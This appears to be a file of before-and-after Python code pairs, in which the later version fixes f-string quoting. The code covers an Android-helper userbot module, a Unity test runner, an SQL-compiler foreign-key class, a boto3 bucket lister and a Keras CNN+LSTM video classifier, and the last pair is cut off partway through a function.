f"**TWRP mais recente para {device}:**\n"
f"[{dl_file}]({dl_link}) - __{size}__\n"
f"**Atualizado:** __{date}__\n"
)
await request.edit(reply)
CMD_HELP.update(
{
"android": ".magisk\
\nÚltimas versões do Magisk\
\n\n.device <codenome>\
\nUso: Obtenha informações sobre codenome ou modelo do dispositivo.\
\n\n.codename <marca> <dispositivo>\
\nUso: Procure pelo codenome do dispositivo.\
\n\n.pixeldl **<download.pixelexperience.org>**\
\nUso: Download da ROM Pixel Experience pro seu servidor do userbot.\
\n\n.specs <marca> <dispositivo>\
\nUso: Obtenha especificações do dispositivo.\
\n\n.twrp <codenome>\
\nUso: Obtenha última versão do TWRP para o dispositivo."
}
)
| # Copyright (C) 2019 The Raphielscape Company LLC.
#
# Licensed under the Raphielscape Public License, Version 1.d (the "License");
# you may not use this file except in compliance with the License.
#
""" Userbot module containing commands related to android"""
import asyncio
import json
import math
import os
import re
import time
from bs4 import BeautifulSoup
from requests import get
from userbot import CMD_HELP, TEMP_DOWNLOAD_DIRECTORY
from userbot.events import register
from userbot.utils import chrome, human_to_bytes, humanbytes, md5, time_formatter
GITHUB = "https://github.com"
@register(outgoing=True, pattern=r"^\.magisk$")
async def magisk(request):
magisk_dict = {
"Stable": "https://raw.githubusercontent.com/topjohnwu/magisk_files/master/stable.json",
"Beta": "https://raw.githubusercontent.com/topjohnwu/magisk_files/master/beta.json",
"Canary": "https://raw.githubusercontent.com/topjohnwu/magisk_files/canary/canary.json",
}
releases = "Últimos lançamentos do Magisk:\n"
for name, release_url in magisk_dict.items():
data = get(release_url).json()
if str(name) == "Canary":
data["magisk"]["link"] = (
"https://github.com/topjohnwu/magisk_files/raw/canary/"
+ data["magisk"]["link"]
)
data["app"]["link"] = (
"https://github.com/topjohnwu/magisk_files/raw/canary/"
+ data["app"]["link"]
)
data["uninstaller"]["link"] = (
"https://github.com/topjohnwu/magisk_files/raw/canary/"
+ data["uninstaller"]["link"]
)
releases += (
f'{name}: [ZIP v{data["magisk"]["version"]}]({data["magisk"]["link"]}) | '
f'[APK v{data["app"]["version"]}]({data["app"]["link"]}) | '
f'[Uninstaller]({data["uninstaller"]["link"]})\n'
)
await request.edit(releases)
@register(outgoing=True, pattern=r"^.device(?: |$)(\S*)")
async def device_info(request):
""" informações básicas do dispositivo android pelo seu codename """
textx = await request.get_reply_message()
codename = request.pattern_match.group(1)
if codename:
pass
elif textx:
codename = textx.text
else:
await request.edit("`Uso: .device <codenome> / <modelo>`")
return
data = json.loads(
get(
"https://raw.githubusercontent.com/androidtrackers/"
"certified-android-devices/master/by_device.json"
).text
)
results = data.get(codename)
if results:
reply = f"**Resultados da pesquisa por {codename}**:\n\n"
for item in results:
reply += (
f"**Marca**: {item['brand']}\n"
f"**Nome**: {item['name']}\n"
f"**Modelo**: {item['model']}\n\n"
)
else:
reply = f"`Sem informações sobre {codename}!`\n"
await request.edit(reply)
@register(outgoing=True, pattern=r"^.codename(?: |)([\S]*)(?: |)([\s\S]*)")
async def codename_info(request):
""" procura por codenome do dispositivo android """
textx = await request.get_reply_message()
brand = request.pattern_match.group(1).lower()
device = request.pattern_match.group(2).lower()
if brand and device:
pass
elif textx:
brand = textx.text.split(" ")[0]
device = " ".join(textx.text.split(" ")[1:])
else:
await request.edit("`Uso: .codename <marca> <dispositivo>`")
return
data = json.loads(
get(
"https://raw.githubusercontent.com/androidtrackers/"
"certified-android-devices/master/by_brand.json"
).text
)
devices_lower = {k.lower(): v for k, v in data.items()} # Lower brand names in JSON
devices = devices_lower.get(brand)
results = [
i
for i in devices
if i["name"].lower() == device.lower() or i["model"].lower() == device.lower()
]
if results:
reply = f"**Resultados da pesquisa por {brand} {device}**:\n\n"
if len(results) > 8:
results = results[:8]
for item in results:
reply += (
f"**Dispositivo**: {item['device']}\n"
f"**Nome**: {item['name']}\n"
f"**Modelo**: {item['model']}\n\n"
)
else:
reply = f"`Sem resultados para {device} codename!`\n"
await request.edit(reply)
@register(outgoing=True, pattern="^.pixeldl(?: |$)(.*)")
async def download_api(dl):
await dl.edit("`Coletando informações...`")
URL = dl.pattern_match.group(1)
URL_MSG = await dl.get_reply_message()
if URL:
pass
elif URL_MSG:
URL = URL_MSG.text
else:
await dl.edit("`Informação vazia...`")
return
if not re.findall(r"\bhttps?://download.*pixelexperience.*\.org\S+", URL):
await dl.edit("`Informação inválida...`")
return
driver = await chrome()
await dl.edit("`Obtendo informações...`")
driver.get(URL)
error = driver.find_elements_by_class_name("swal2-content")
if len(error) > 0:
if error[0].text == "Arquivo Inválido.":
await dl.edit(f"`FileNotFoundError`: {URL} inválido.")
return
datas = driver.find_elements_by_class_name("download__meta")
""" - enumere os dados para ter certeza de que o download corresponda com a versão - """
md5_origin = None
i = None
for index, value in enumerate(datas):
for data in value.text.split("\n"):
if data.startswith("MD5"):
md5_origin = data.split(":")[1].strip()
i = index
break
if md5_origin is not None and i is not None:
break
if md5_origin is None and i is None:
await dl.edit("`Não há versão equivalente disponível...`")
if URL.endswith("/"):
file_name = URL.split("/")[-2]
else:
file_name = URL.split("/")[-1]
file_path = TEMP_DOWNLOAD_DIRECTORY + file_name
download = driver.find_elements_by_class_name("download__btn")[i]
download.click()
await dl.edit("`Começando download...`")
file_size = human_to_bytes(download.text.split(None, 3)[-1].strip("()"))
display_message = None
complete = False
start = time.time()
while complete is False:
if os.path.isfile(file_path + ".crdownload"):
try:
downloaded = os.stat(file_path + ".crdownload").st_size
status = "Baixando"
except OSError: # Rare case
await asyncio.sleep(1)
continue
elif os.path.isfile(file_path):
downloaded = os.stat(file_path).st_size
file_size = downloaded
status = "Checando"
else:
await asyncio.sleep(0.3)
continue
diff = time.time() - start
percentage = downloaded / file_size * 100
speed = round(downloaded / diff, 2)
eta = round((file_size - downloaded) / speed)
prog_str = "`{0}` | [{1}{2}] `{3}%`".format(
status,
"".join(["■" for i in range(math.floor(percentage / 10))]),
"".join(["▨" for i in range(10 - math.floor(percentage / 10))]),
round(percentage, 2),
)
current_message = (
"`[DOWNLOAD]`\n\n"
f"`{file_name}`\n"
f"`Status`\n{prog_str}\n"
f"`{humanbytes(downloaded)} of {humanbytes(file_size)}"
f" @ {humanbytes(speed)}`\n"
f"`Tempo Estimado` -> {time_formatter(eta)}"
)
if (
round(diff % 15.00) == 0
and display_message != current_message
or (downloaded == file_size)
):
await dl.edit(current_message)
display_message = current_message
if downloaded == file_size:
if not os.path.isfile(file_path): # Rare case
await asyncio.sleep(1)
continue
MD5 = await md5(file_path)
if md5_origin == MD5:
complete = True
else:
await dl.edit("`Download corrompido...`")
os.remove(file_path)
driver.quit()
return
await dl.respond(f"`{file_name}`\n\n" f"Download finalizado em `{file_path}`.")
await dl.delete()
driver.quit()
return
@register(outgoing=True, pattern=r"^.specs(?: |)([\S]*)(?: |)([\s\S]*)")
async def devices_specifications(request):
""" Mobile devices specifications """
textx = await request.get_reply_message()
brand = request.pattern_match.group(1).lower()
device = request.pattern_match.group(2).lower()
if brand and device:
pass
elif textx:
brand = textx.text.split(" ")[0]
device = " ".join(textx.text.split(" ")[1:])
else:
await request.edit("`Uso: .specs <marca> <dispositivo>`")
return
all_brands = (
BeautifulSoup(
get("https://www.devicespecifications.com/en/brand-more").content, "lxml"
)
.find("div", {"class": "brand-listing-container-news"})
.findAll("a")
)
brand_page_url = None
try:
brand_page_url = [
i["href"] for i in all_brands if brand == i.text.strip().lower()
][0]
except IndexError:
await request.edit(f"`{brand} é uma marca desconhecida/inexistente!`")
devices = BeautifulSoup(get(brand_page_url).content, "lxml").findAll(
"div", {"class": "model-listing-container-80"}
)
device_page_url = None
try:
device_page_url = [
i.a["href"]
for i in BeautifulSoup(str(devices), "lxml").findAll("h3")
if device in i.text.strip().lower()
]
except IndexError:
await request.edit(f"`não foi possível achar {device}!`")
if len(device_page_url) > 2:
device_page_url = device_page_url[:2]
reply = ""
for url in device_page_url:
info = BeautifulSoup(get(url).content, "lxml")
reply = "\n" + info.title.text.split("-")[0].strip() + "\n"
info = info.find("div", {"id": "model-brief-specifications"})
specifications = re.findall(r"<b>.*?<br/>", str(info))
for item in specifications:
title = re.findall(r"<b>(.*?)</b>", item)[0].strip()
data = (
re.findall(r"</b>: (.*?)<br/>", item)[0]
.replace("<b>", "")
.replace("</b>", "")
.strip()
)
reply += f"**{title}**: {data}\n"
await request.edit(reply)
@register(outgoing=True, pattern=r"^.twrp(?: |$)(\S*)")
async def twrp(request):
""" get android device twrp """
textx = await request.get_reply_message()
device = request.pattern_match.group(1)
if device:
pass
elif textx:
device = textx.text.split(" ")[0]
else:
await request.edit("`Uso: .twrp <codenome>`")
return
url = get(f"https://dl.twrp.me/{device}/")
if url.status_code == 404:
reply = f"`Não foi possível achar downloads para {device}!`\n"
await request.edit(reply)
return
page = BeautifulSoup(url.content, "lxml")
download = page.find("table").find("tr").find("a")
dl_link = f"https://dl.twrp.me{download['href']}"
dl_file = download.text
size = page.find("span", {"class": "filesize"}).text
date = page.find("em").text.strip()
reply = (
f"**TWRP mais recente para {device}:**\n"
f"[{dl_file}]({dl_link}) - __{size}__\n"
f"**Atualizado:** __{date}__\n"
)
await request.edit(reply)
CMD_HELP.update(
{
"android": ".magisk\
\nÚltimas versões do Magisk\
\n\n.device <codenome>\
\nUso: Obtenha informações sobre codenome ou modelo do dispositivo.\
\n\n.codename <marca> <dispositivo>\
\nUso: Procure pelo codenome do dispositivo.\
\n\n.pixeldl **<download.pixelexperience.org>**\
\nUso: Download da ROM Pixel Experience pro seu servidor do userbot.\
\n\n.specs <marca> <dispositivo>\
\nUso: Obtenha especificações do dispositivo.\
\n\n.twrp <codenome>\
\nUso: Obtenha última versão do TWRP para o dispositivo."
}
)
|
import sys
import subprocess
from .yamato_utils import get_base_path, get_unity_executable_path
def main():
base_path = get_base_path()
print(f"Running in base path {base_path}")
unity_exe = get_unity_executable_path()
print(f"Starting tests via {unity_exe}")
test_args = [
unity_exe,
"-projectPath",
f"{base_path}/UnitySDK",
"-logfile",
"-",
"-batchmode",
"-executeMethod",
"MLAgents.StandaloneBuildTest.BuildStandalonePlayerOSX",
]
print(f"{" ".join(test_args)} ...")
timeout = 30 * 60 # 30 minutes, just in case
res: subprocess.CompletedProcess = subprocess.run(test_args, timeout=timeout)
if res.returncode == 0:
print("Test run SUCCEEDED!")
else:
print("Test run FAILED!")
sys.exit(res.returncode)
if __name__ == "__main__":
main()
| import sys
import subprocess
from .yamato_utils import get_base_path, get_unity_executable_path
def main():
base_path = get_base_path()
print(f"Running in base path {base_path}")
unity_exe = get_unity_executable_path()
print(f"Starting tests via {unity_exe}")
test_args = [
unity_exe,
"-projectPath",
f"{base_path}/UnitySDK",
"-logfile",
"-",
"-batchmode",
"-executeMethod",
"MLAgents.StandaloneBuildTest.BuildStandalonePlayerOSX",
]
print(f"{' '.join(test_args)} ...")
timeout = 30 * 60 # 30 minutes, just in case
res: subprocess.CompletedProcess = subprocess.run(test_args, timeout=timeout)
if res.returncode == 0:
print("Test run SUCCEEDED!")
else:
print("Test run FAILED!")
sys.exit(res.returncode)
if __name__ == "__main__":
main()
|
from Instrucciones.TablaSimbolos.Instruccion import Instruccion
from Instrucciones.Sql_create.Tipo_Constraint import Tipo_Constraint, Tipo_Dato_Constraint
from Instrucciones.Excepcion import Excepcion
#from storageManager.jsonMode import *
# Asocia la integridad referencial entre llaves foráneas y llaves primarias,
# para efectos de la fase 1 se ignora esta petición.
class AlterTableAddFK(Instruccion):
def __init__(self, tabla, lista_col, tabla_ref, lista_fk, strGram,linea, columna):
Instruccion.__init__(self,None,linea,columna,strGram)
self.tabla = tabla
self.lista_col = lista_col
self.tabla_ref = tabla_ref
self.lista_fk = lista_fk
def ejecutar(self, tabla, arbol):
super().ejecutar(tabla,arbol)
if arbol.bdUsar != None:
objetoTabla = arbol.devolviendoTablaDeBase(self.tabla)
if objetoTabla != 0:
tablaForanea = arbol.devolviendoTablaDeBase(self.tabla_ref)
if tablaForanea != 0:
listaTabla1 = []
tabla1Nombres = []
for c in self.lista_col:
for columnas in objetoTabla.lista_de_campos:
if columnas.nombre == c:
listaTabla1.append(columnas)
tabla1Nombres.append(columnas.nombre)
if(len(listaTabla1)==len(self.lista_col)):
listaForaneas = []
tabla2Nombres = []
for c in self.lista_fk:
for columnas in tablaForanea.lista_de_campos:
if columnas.nombre == c:
listaForaneas.append(columnas)
tabla2Nombres.append(columnas.nombre)
if(len(listaForaneas)==len(self.lista_fk)):
listaPrimarias = 0
for columna in listaForaneas:
if columna.constraint != None:
for i in columna.constraint:
if i.tipo == Tipo_Dato_Constraint.PRIMARY_KEY:
listaPrimarias += 1
else:
error = Excepcion('42P01',"Semántico","No hay restricción unique que coincida con las columnas dadas en la tabla referida «"+self.tabla_ref+"»",self.linea,self.columna)
arbol.excepciones.append(error)
arbol.consola.append(error.toString())
return
if listaPrimarias == len(self.lista_fk):
for c in range(0,len(listaTabla1)):
if listaTabla1[c].constraint != None:
restriccion = Tipo_Constraint(self.tabla+"_"+listaTabla1[c].nombre+"_fkey", Tipo_Dato_Constraint.FOREIGN_KEY, listaForaneas[c])
restriccion.referencia = self.tabla_ref
listaTabla1[c].constraint.append(restriccion)
else:
listaTabla1[c].constraint = []
restriccion = Tipo_Constraint(self.tabla+"_"+listaTabla1[c].nombre+"_fkey", Tipo_Dato_Constraint.FOREIGN_KEY, listaForaneas[c])
restriccion.referencia = self.tabla_ref
listaTabla1[c].constraint.append(restriccion)
arbol.consola.append("Consulta devuelta correctamente.")
print ("Consulta ALTER TABLE ADD FK devuleta correctamente")
else:
error = Excepcion('42P01',"Semántico","No hay restricción unique que coincida con las columnas dadas en la tabla referida «"+self.tabla_ref+"»",self.linea,self.columna)
arbol.excepciones.append(error)
arbol.consola.append(error.toString())
return
else:
lista = set(self.lista_fk) - set(tabla2Nombres)
#print(tabla2Nombres,self.lista_fk)
#print(lista)
for i in lista:
error = Excepcion('42P01',"Semántico","No existe la columna «"+i+"» en la llave",self.linea,self.columna)
arbol.excepciones.append(error)
arbol.consola.append(error.toString())
return
else:
lista = set(self.lista_col) - set(tabla1Nombres)
#print(tabla1Nombres,self.lista_col)
#print(lista)
for i in lista:
error = Excepcion('42P01',"Semántico","No existe la columna «"+i+"» en la llave",self.linea,self.columna)
arbol.excepciones.append(error)
arbol.consola.append(error.toString())
return
else:
error = Excepcion('42P01',"Semántico","No existe la relación "+self.tabla_ref,self.linea,self.columna)
arbol.excepciones.append(error)
arbol.consola.append(error.toString())
return error
else:
error = Excepcion('42P01',"Semántico","No existe la relación "+self.tabla,self.linea,self.columna)
arbol.excepciones.append(error)
arbol.consola.append(error.toString())
return error
else:
error = Excepcion("100","Semantico","No ha seleccionado ninguna Base de Datos.",self.linea,self.columna)
arbol.excepciones.append(error)
arbol.consola.append(error.toString())
def getCodigo(self, tabla, arbol):
tabla = f"{self.tabla}"
tabla2 = f"{self.tabla_ref}"
#tipo = f"{self.tipo}"
campos1 = f""
campos2 = f""
for item in self.lista_col:
campos1 += f"{item}{", " if self.lista_col.index(item) < len(self.lista_col) - 1 else ""}"
for item in self.lista_fk:
campos2 += f"{item}{", " if self.lista_fk.index(item) < len(self.lista_fk) - 1 else ""}"
table = f"ALTER TABLE {tabla} ADD FOREIGN KEY ({campos1}) REFERENCES {tabla2} ({campos2});"
num_params = 1
temp_param1 = arbol.getTemporal()
temp_tam_func = arbol.getTemporal()
temp_index_param1 = arbol.getTemporal()
temp_return = arbol.getTemporal()
temp_result = arbol.getTemporal()
codigo = f"\t#ALTER TABLE ADD FK 3D\n"
codigo += f"\t{temp_param1} = f\"{table}\"\n"
codigo += f"\t{temp_tam_func} = pointer + {num_params}\n"
codigo += f"\t{temp_index_param1} = {temp_tam_func} + 1\n"
codigo += f"\tstack[{temp_index_param1}] = {temp_param1}\n"
codigo += f"\tpointer = pointer + {num_params}\n"
codigo += f"\tinter()\n"
#codigo += f"\t{temp_return} = pointer + 0\n"
#codigo += f"\t{temp_result} = stack[{temp_return}]\n"
codigo += f"\tpointer = pointer - {num_params}\n"
#codigo += f"\tprint({temp_result})\n"
#arbol.consola.append(codigo)
return codigo
| from Instrucciones.TablaSimbolos.Instruccion import Instruccion
from Instrucciones.Sql_create.Tipo_Constraint import Tipo_Constraint, Tipo_Dato_Constraint
from Instrucciones.Excepcion import Excepcion
#from storageManager.jsonMode import *
# Asocia la integridad referencial entre llaves foráneas y llaves primarias,
# para efectos de la fase 1 se ignora esta petición.
class AlterTableAddFK(Instruccion):
def __init__(self, tabla, lista_col, tabla_ref, lista_fk, strGram,linea, columna):
Instruccion.__init__(self,None,linea,columna,strGram)
self.tabla = tabla
self.lista_col = lista_col
self.tabla_ref = tabla_ref
self.lista_fk = lista_fk
def ejecutar(self, tabla, arbol):
super().ejecutar(tabla,arbol)
if arbol.bdUsar != None:
objetoTabla = arbol.devolviendoTablaDeBase(self.tabla)
if objetoTabla != 0:
tablaForanea = arbol.devolviendoTablaDeBase(self.tabla_ref)
if tablaForanea != 0:
listaTabla1 = []
tabla1Nombres = []
for c in self.lista_col:
for columnas in objetoTabla.lista_de_campos:
if columnas.nombre == c:
listaTabla1.append(columnas)
tabla1Nombres.append(columnas.nombre)
if(len(listaTabla1)==len(self.lista_col)):
listaForaneas = []
tabla2Nombres = []
for c in self.lista_fk:
for columnas in tablaForanea.lista_de_campos:
if columnas.nombre == c:
listaForaneas.append(columnas)
tabla2Nombres.append(columnas.nombre)
if(len(listaForaneas)==len(self.lista_fk)):
listaPrimarias = 0
for columna in listaForaneas:
if columna.constraint != None:
for i in columna.constraint:
if i.tipo == Tipo_Dato_Constraint.PRIMARY_KEY:
listaPrimarias += 1
else:
error = Excepcion('42P01',"Semántico","No hay restricción unique que coincida con las columnas dadas en la tabla referida «"+self.tabla_ref+"»",self.linea,self.columna)
arbol.excepciones.append(error)
arbol.consola.append(error.toString())
return
if listaPrimarias == len(self.lista_fk):
for c in range(0,len(listaTabla1)):
if listaTabla1[c].constraint != None:
restriccion = Tipo_Constraint(self.tabla+"_"+listaTabla1[c].nombre+"_fkey", Tipo_Dato_Constraint.FOREIGN_KEY, listaForaneas[c])
restriccion.referencia = self.tabla_ref
listaTabla1[c].constraint.append(restriccion)
else:
listaTabla1[c].constraint = []
restriccion = Tipo_Constraint(self.tabla+"_"+listaTabla1[c].nombre+"_fkey", Tipo_Dato_Constraint.FOREIGN_KEY, listaForaneas[c])
restriccion.referencia = self.tabla_ref
listaTabla1[c].constraint.append(restriccion)
arbol.consola.append("Consulta devuelta correctamente.")
print ("Consulta ALTER TABLE ADD FK devuleta correctamente")
else:
error = Excepcion('42P01',"Semántico","No hay restricción unique que coincida con las columnas dadas en la tabla referida «"+self.tabla_ref+"»",self.linea,self.columna)
arbol.excepciones.append(error)
arbol.consola.append(error.toString())
return
else:
lista = set(self.lista_fk) - set(tabla2Nombres)
#print(tabla2Nombres,self.lista_fk)
#print(lista)
for i in lista:
error = Excepcion('42P01',"Semántico","No existe la columna «"+i+"» en la llave",self.linea,self.columna)
arbol.excepciones.append(error)
arbol.consola.append(error.toString())
return
else:
lista = set(self.lista_col) - set(tabla1Nombres)
#print(tabla1Nombres,self.lista_col)
#print(lista)
for i in lista:
error = Excepcion('42P01',"Semántico","No existe la columna «"+i+"» en la llave",self.linea,self.columna)
arbol.excepciones.append(error)
arbol.consola.append(error.toString())
return
else:
error = Excepcion('42P01',"Semántico","No existe la relación "+self.tabla_ref,self.linea,self.columna)
arbol.excepciones.append(error)
arbol.consola.append(error.toString())
return error
else:
error = Excepcion('42P01',"Semántico","No existe la relación "+self.tabla,self.linea,self.columna)
arbol.excepciones.append(error)
arbol.consola.append(error.toString())
return error
else:
error = Excepcion("100","Semantico","No ha seleccionado ninguna Base de Datos.",self.linea,self.columna)
arbol.excepciones.append(error)
arbol.consola.append(error.toString())
def getCodigo(self, tabla, arbol):
tabla = f"{self.tabla}"
tabla2 = f"{self.tabla_ref}"
#tipo = f"{self.tipo}"
campos1 = f""
campos2 = f""
for item in self.lista_col:
campos1 += f"{item}{', ' if self.lista_col.index(item) < len(self.lista_col) - 1 else ''}"
for item in self.lista_fk:
campos2 += f"{item}{', ' if self.lista_fk.index(item) < len(self.lista_fk) - 1 else ''}"
table = f"ALTER TABLE {tabla} ADD FOREIGN KEY ({campos1}) REFERENCES {tabla2} ({campos2});"
num_params = 1
temp_param1 = arbol.getTemporal()
temp_tam_func = arbol.getTemporal()
temp_index_param1 = arbol.getTemporal()
temp_return = arbol.getTemporal()
temp_result = arbol.getTemporal()
codigo = f"\t#ALTER TABLE ADD FK 3D\n"
codigo += f"\t{temp_param1} = f\"{table}\"\n"
codigo += f"\t{temp_tam_func} = pointer + {num_params}\n"
codigo += f"\t{temp_index_param1} = {temp_tam_func} + 1\n"
codigo += f"\tstack[{temp_index_param1}] = {temp_param1}\n"
codigo += f"\tpointer = pointer + {num_params}\n"
codigo += f"\tinter()\n"
#codigo += f"\t{temp_return} = pointer + 0\n"
#codigo += f"\t{temp_result} = stack[{temp_return}]\n"
codigo += f"\tpointer = pointer - {num_params}\n"
#codigo += f"\tprint({temp_result})\n"
#arbol.consola.append(codigo)
return codigo
|
import boto3
# Retrieve the list of existing buckets
s3 = boto3.client('s3')
response = s3.list_buckets()
# Output the bucket names
print('Existing buckets:')
for bucket in response['Buckets']:
print(f' {bucket['Name']}') | import boto3
# Retrieve the list of existing buckets
s3 = boto3.client('s3')
response = s3.list_buckets()
# Output the bucket names
print('Existing buckets:')
for bucket in response['Buckets']:
print(f' {bucket["Name"]}') |
import os
import numpy as np
import glob
import cv2, json
import argparse
from sklearn.utils import shuffle
from keras.optimizers import SGD, Adam
from keras.models import Sequential
from keras.layers import Dropout, Dense
from keras.callbacks import EarlyStopping, ModelCheckpoint
from keras.preprocessing import image
from keras.preprocessing.image import ImageDataGenerator
from keras import applications
from keras.applications.inception_v3 import InceptionV3
from keras.applications.inception_v3 import preprocess_input
from keras.layers import LSTM
from keras.models import load_model, Model
from sequence_data_generator import FramesSeqGenerator, FeaturesSeqGenerator
from data_generator import DataGenerator
from keras import backend as K
# BATCH_SIZE = 32
# SEED = 42
def extract_cnn_features(raw_data_dir, features_dir):
# base_model = InceptionV3(include_top=False, weights='imagenet', input_shape=(224, 224, 3))
# print("Base model shape")
# print(base_model.input_shape)
model = InceptionV3(weights='imagenet', include_top=True)
base_model = Model(inputs=model.input, outputs=model.get_layer('avg_pool').output)
_, height, width, channels = base_model.input_shape
frames = FramesSeqGenerator(raw_data_dir, BATCH_SIZE, 20, height, width, channels, False)
for i, video in frames.videos_list.iterrows():
video_name = video.frames_dir.split('/')[-1]
label = video.label
print(f'Video label = {label}')
features_path = f'{features_dir}/{label}/{video_name}.npy'
X, y = frames.generate(video)
print(f'X shape = {X.shape}')
features = base_model.predict(X)
print(f'features shape = {features.shape}')
if not os.path.exists(f'{features_dir}/{label}'):
os.makedirs(f'{features_dir}/{label}')
np.save(features_path, features)
return
def extract_cnn_features_all(raw_data_dir, features_dir):
model = InceptionV3(weights='imagenet', include_top=True)
base_model = Model(inputs=model.input, outputs=model.get_layer('avg_pool').output)
_, height, width, channels = base_model.input_shape
print(base_model.input_shape)
signs = sorted([name for name in os.listdir(raw_data_dir) if os.path.isdir(os.path.join(raw_data_dir, name))])
for sign in signs:
print("\nSign = {0}\n-------------------".format(sign))
videos = sorted([name for name in os.listdir(os.path.join(raw_data_dir, sign)) if os.path.isdir(os.path.join(raw_data_dir, sign, name))])
# For each video we will save the cnn features computed on each image
for video in videos:
print("Video = {0}".format(video))
features_path = f'{features_dir}/{sign}/{video}.npy'
if not os.path.exists(f'{features_dir}/{sign}'):
os.makedirs(f'{features_dir}/{sign}')
pathname = os.path.join(raw_data_dir, sign, video, '*.jpg')
imagenames = sorted(glob.glob(pathname))
featuresList = []
for imagename in imagenames:
img = image.load_img(imagename, target_size=(height, width))
img_data = image.img_to_array(img)
img_data = np.expand_dims(img_data, axis=0)
img_data = preprocess_input(img_data)
inceptionv3_feature = base_model.predict(img_data)
featuresList.append(inceptionv3_feature)
stackedFeatures = np.vstack(featuresList)
np.save(features_path, stackedFeatures)
print("{0} images processed\n".format(len(featuresList)))
def train_lstm(features_path, epochs, num_features, num_classess, batch_size=32):
    """Train a two-layer LSTM classifier on pre-extracted CNN feature sequences.

    Args:
        features_path: root containing 'train' and 'test' feature directories.
        epochs: number of training epochs.
        num_features: dimensionality of each per-frame feature vector.
        num_classess: number of output classes.
        batch_size: mini-batch size. Replaces the module-level BATCH_SIZE
            constant, which is commented out and made the original raise
            NameError at runtime.

    Returns:
        The trained Keras model.
    """
    model = Sequential()
    model.add(LSTM(num_features, dropout=0.2, input_shape=(20, num_features), return_sequences=True))
    model.add(LSTM(num_features * 1, return_sequences=False))
    model.add(Dense(num_classess, activation='softmax'))
    optimizer = Adam(lr=1e-4)
    model.compile(optimizer=optimizer, loss='categorical_crossentropy', metrics=['accuracy'])
    # Keep only the best checkpoint (lowest validation loss) on disk.
    callbacks = [ModelCheckpoint('video_1_LSTM_1_1024.h5', monitor='val_loss', save_best_only=True, verbose=0)]
    train_features = FeaturesSeqGenerator(features_path + '/train', batch_size, model.input_shape[1:])
    val_features = FeaturesSeqGenerator(features_path + '/test', batch_size, model.input_shape[1:])
    model.fit_generator(generator=train_features,
                        validation_data=val_features,
                        epochs=int(epochs),
                        workers=1,
                        use_multiprocessing=False,
                        verbose=1,
                        callbacks=callbacks)
    return model
def train_lstm_jittered(features_path, sequencelength, epochs, num_features, num_classess):
    """Train an LSTM classifier on jittered (randomly sampled) feature sequences.

    Fixes the original bug where the `features_path` argument was ignored and
    both data generators always read from the hard-coded 'cnn_features'
    directory.

    Args:
        features_path: root containing 'train' and 'test' feature directories.
        sequencelength: number of timesteps sampled per sequence.
        epochs: number of training epochs.
        num_features: dimensionality of each per-frame feature vector.
        num_classess: number of output classes.

    Returns:
        The trained Keras model.
    """
    model = Sequential()
    model.add(LSTM(2048, return_sequences=False, input_shape=(sequencelength, num_features), dropout=0.5))
    model.add(Dense(512, activation='relu'))
    model.add(Dropout(0.5))
    model.add(Dense(num_classess, activation='softmax'))
    optimizer = Adam(lr=1e-4)
    model.compile(loss='categorical_crossentropy', optimizer=optimizer, metrics=['accuracy'])
    callbacks = [ModelCheckpoint('video_LSTM.h5', monitor='val_loss', save_best_only=True, verbose=1)]
    # Shuffle and use a larger batch for training; validate deterministically.
    train_gen = DataGenerator(f'{features_path}/train',
                              batch_size=32,
                              featureLength=2048,
                              seqLength=sequencelength,
                              shuffle=True)
    val_gen = DataGenerator(f'{features_path}/test',
                            batch_size=16,
                            featureLength=2048,
                            seqLength=sequencelength,
                            shuffle=False)
    model.fit_generator(generator=train_gen,
                        validation_data=val_gen,
                        epochs=int(epochs),
                        workers=1,
                        use_multiprocessing=False,
                        verbose=1,
                        callbacks=callbacks)
    return model
if __name__ == '__main__':
    # CLI entry point: parse options, then train the jittered LSTM on
    # previously extracted CNN features.
    parser = argparse.ArgumentParser(description='Train CNN+LSTM model for short video snippets')
    parser.add_argument('--data-path', default='processed_data', required=False, help='path to the train and test directories')
    parser.add_argument('--lstm-epochs', default=100, required=False, help='number of LSTM epochs')
    parser.add_argument('--reload-cnn-features', default=True, required=False, help='re-extract CNN features from frames')
    parser.add_argument('--features-path', default='cnn_features', required=False, help='extracted CNN features path')
    args = vars(parser.parse_args())
    print(args)
    if args.get('data_path') is None:
        print('Please provide path to video frames')
        exit()
    # GPU configuration
    # K.tensorflow_backend._get_available_gpus()
    # config = tf.ConfigProto( device_count = {'GPU': 200, 'CPU': 4} )
    # sess = tf.Session(config=config)
    # keras.backend.set_session(sess)
    # extract_cnn_features(f"{args['data_path']}/train", f"{args['features_path']}/train")
    # extract_cnn_features(f"{args['data_path']}/test", f"{args['features_path']}/test")
    # extract_cnn_features_all(f"{args['data_path']}/train", f"{args['features_path']}/train")
    # extract_cnn_features_all(f"{args['data_path']}/test", f"{args['features_path']}/test")
    # model = train_lstm(args['features_path'], args['lstm_epochs'], num_features, num_classes)
    num_features = 2048
    # One class per sub-directory of the extracted training features.
    # NOTE: outer double quotes fix the original f'{args['features_path']}...'
    # form, which is a SyntaxError on Python versions before 3.12.
    num_classes = len(os.listdir(f"{args['features_path']}/train"))
    seqLength = 10
    model = train_lstm_jittered(args['features_path'], seqLength, args['lstm_epochs'], num_features, num_classes)
    # model.save("final_model.h5")
| import os
import numpy as np
import glob
import cv2, json
import argparse
from sklearn.utils import shuffle
from keras.optimizers import SGD, Adam
from keras.models import Sequential
from keras.layers import Dropout, Dense
from keras.callbacks import EarlyStopping, ModelCheckpoint
from keras.preprocessing import image
from keras.preprocessing.image import ImageDataGenerator
from keras import applications
from keras.applications.inception_v3 import InceptionV3
from keras.applications.inception_v3 import preprocess_input
from keras.layers import LSTM
from keras.models import load_model, Model
from sequence_data_generator import FramesSeqGenerator, FeaturesSeqGenerator
from data_generator import DataGenerator
from keras import backend as K
# BATCH_SIZE = 32
# SEED = 42
def extract_cnn_features(raw_data_dir, features_dir, batch_size=32):
    """Extract InceptionV3 'avg_pool' features for each video listed by FramesSeqGenerator.

    Args:
        raw_data_dir: directory of per-video frame folders.
        features_dir: output root; features are saved to <features_dir>/<label>/<video>.npy.
        batch_size: mini-batch size for the frame generator. Replaces the
            module-level BATCH_SIZE constant, which is commented out and made
            the original raise NameError at runtime.
    """
    # Use the penultimate ('avg_pool') layer of InceptionV3 as a fixed feature extractor.
    model = InceptionV3(weights='imagenet', include_top=True)
    base_model = Model(inputs=model.input, outputs=model.get_layer('avg_pool').output)
    _, height, width, channels = base_model.input_shape
    frames = FramesSeqGenerator(raw_data_dir, batch_size, 20, height, width, channels, False)
    for _, video in frames.videos_list.iterrows():
        video_name = video.frames_dir.split('/')[-1]
        label = video.label
